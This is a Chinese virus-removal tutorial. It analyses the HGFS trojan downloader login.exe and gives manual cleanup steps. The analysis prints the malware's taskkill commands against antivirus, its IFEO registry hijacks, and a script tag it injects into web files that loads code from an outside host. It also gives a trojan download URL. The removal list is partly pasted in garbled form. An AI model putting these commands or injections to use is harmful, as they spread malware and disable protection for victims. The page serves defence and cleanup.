login.exe HGFS木马下载器的手动查杀方法

所属分类: 实用技巧 / 病毒查杀 阅读数: 1176
收藏 0 赞 0 分享
样本信息:File: login.exe
Size: 25428 bytes
Modified: 2008年4月25日, 16:30:08
MD5: 9777E8C79312F2E3D175AA1F64B07C11
SHA1: 4236D76C4FAEFE1CDF22414A25E946E493E0D52E
CRC32: 5A562203

1.病毒初始化:创建互斥量HGFSMUTEX,保证系统内只有一个实例在运行

2.释放如下文件或者副本
%systemroot%\system32\Autorun.exe
%systemroot%\system32\Autorun.inf
%systemroot%\system32\connnet.bat
%systemroot%\system32\int.exe
并复制到如下启动文件夹中达到开机启动自身的目的
C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\login.exe
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\login.exe
C:\Documents and Settings\Default User\「开始」菜单\程序\启动\login.exe

3.执行connnet.bat批处理内的内容

a.遍历d~z盘 复制%systemroot%\system32\Autorun.inf和%systemroot%\system32\Autorun.exe到其根目录下

b.判断中毒机器是否处于局域网,如果是则利用ipc漏洞建立一个空连接,并把autorun.exe和%autorun.inf复制到机器的C$下面。

4.IFEO劫持某些杀毒软件
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safe.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravmon.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravmond.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravstub.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravtask.exe
指向c:\\我就不给你启动.exe

5.试图结束360软件
cmd /c taskkill /im 360safe.exe /f
cmd /c taskkill /im 360tray.exe /f

6.遍历所有磁盘删除.gho文件

7.遍历所有磁盘感染asp,htm,html,aspx,php等文件
在其尾部加入<script language=javascript src=http://down.******.cn/1.js></script>的代码

8.链接网络下载木马
http://17vp.cn/down/gr.exe到
C:\Program Files\Internet Explorer\1.exe
但链接已经失效

解决方法:

1.复制如下文字 到剪贴板(假设系统在C盘)
%systemroot%\system32\Autorun.exe
%systemroot%\system32\Autorun.inf
%systemroot%\system32\connnet.bat
%systemroot%\system32\int.exe
并复制到如下启动文件夹中达到开机启动自身的目的
C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\login.exe
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\login.exe
C:\Documents and Settings\Default User\「开始」菜单\程序\启动\login.exe


打开Xdelbox.exe
在下面的大框中 单击右键 点击 “剪贴板导入不检查路径”
之后刚才复制的那个文件列表将出现在下面的大框中
然后再在下面的大框中单击右键 点击 “立即重启执行删除” 
软件会自动重启计算机

重启计算机以后 会有两个系统进入的选择的倒计时界面
第一个是你原来的windows系统
第二个是这个软件给你设定的dos系统
不用你管,它会自动选择进入第二个系统
类似dos的界面滚动完毕以后 病毒就被删除了
之后他会自动重启进入正常模式

2.打开sreng 启动项目 注册表
删除所有红色的IFEO项目

3.建议屏蔽http://17vp.cn网站
更多精彩内容其他人还在看

手工毒霸删除瓢虫病毒的图文教程第1/3页

手工毒霸删除瓢虫病毒的图文教程
收藏 0 赞 0 分享

19.exe,pagefile.pif专杀 pagefile.pif病毒 auto.inf

手工查杀新落雪病毒(19.exe,pagefile.pif,autorun.inf)
收藏 0 赞 0 分享

happy2008病毒专杀 happy2008病毒

Happy2008.zip病毒分析手动解决
收藏 0 赞 0 分享

avwghmn.dll svchost.exe病毒删除方法

avwghmn.dll svchost.exe病毒删除方法
收藏 0 赞 0 分享

木马程序Trojan-Spy.Win32.Agent.cfu清除方法

木马程序Trojan-Spy.Win32.Agent.cfu清除方法
收藏 0 赞 0 分享

Downloader Win32.Delf.dqu(IRAT.rmvb,mm.exe)分析查杀

Downloader Win32.Delf.dqu(IRAT.rmvb,mm.exe)分析查杀
收藏 0 赞 0 分享

中病毒后常用的解决方法病毒终极解决方案

中病毒后常用的解决方法病毒终极解决方案
收藏 0 赞 0 分享

系统时间改为2000年 修改系统时间病毒

系统时间改为2000年 修改系统时间病毒
收藏 0 赞 0 分享

病毒的万能查杀方法第1/2页

当发现病毒后,不要害怕,我们可以按照下面的方法,去试试,一般只需要不要给病毒运行的机会就可以了,一般进安全模式,去除病毒可能隐藏的启动项里。
收藏 0 赞 0 分享

sreng免费下载 sreng最新版下载

病毒查找利器
收藏 0 赞 0 分享
查看更多